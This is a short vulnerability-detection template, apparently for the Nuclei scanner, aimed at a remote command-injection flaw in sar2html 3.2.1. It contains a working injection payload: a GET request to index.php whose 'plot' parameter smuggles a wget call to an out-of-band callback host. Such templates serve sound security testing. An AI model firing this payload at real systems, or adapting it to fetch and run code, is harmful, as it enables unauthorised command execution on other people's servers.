2021-08-11 04:58:08 +00:00
id : sar2html-rce
info :
2022-05-30 16:19:44 +00:00
name : sar2html 3.2.1 - Remote Command Injection
2021-08-11 04:58:08 +00:00
author : gy741
severity : critical
2022-05-31 09:11:26 +00:00
description : |
SAR2HTML could allow a remote attacker to execute arbitrary commands on the system via a command injection flaw in the index.php script. By sending specially-crafted commands, an attacker could exploit this vulnerability to execute arbitrary commands on the system.
2022-04-22 10:38:41 +00:00
reference :
- https://www.exploit-db.com/exploits/49344
2022-05-30 16:19:44 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score : 10.0
cwe-id : CWE-77
2022-08-27 04:41:18 +00:00
tags : sar2html,rce,oast,edb
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2021-08-11 04:58:08 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-08-11 04:58:08 +00:00
- raw :
- |
2021-08-12 09:33:49 +00:00
GET /index.php?plot=;wget%20http://{{interactsh-url}} HTTP/1.1
2021-08-11 04:58:08 +00:00
Host : {{Hostname}}
Accept : */*
matchers :
- type : word
part : interactsh_protocol # Confirms the HTTP Interaction
words :
- "http"